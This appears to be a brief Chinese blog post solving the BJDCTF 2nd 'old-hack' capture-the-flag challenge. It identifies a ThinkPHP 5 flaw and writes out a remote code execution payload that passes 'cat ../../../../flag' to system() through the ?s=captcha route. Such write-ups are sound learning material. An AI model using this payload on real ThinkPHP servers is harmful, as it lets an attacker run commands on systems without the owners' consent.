BJDCTF 2nd old-hack

解题

打开页面后发现根本看不懂,看了一下大佬的博客才发现是tp5漏洞。

首先我们先访问 ?s=captcha

 

 是这个样子的。看一下tp5漏洞分析,知道pyload: _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat ../../../../flag 

 

posted @ 2021-04-26 19:54  AW_SOLE  阅读(49)  评论(0编辑  收藏  举报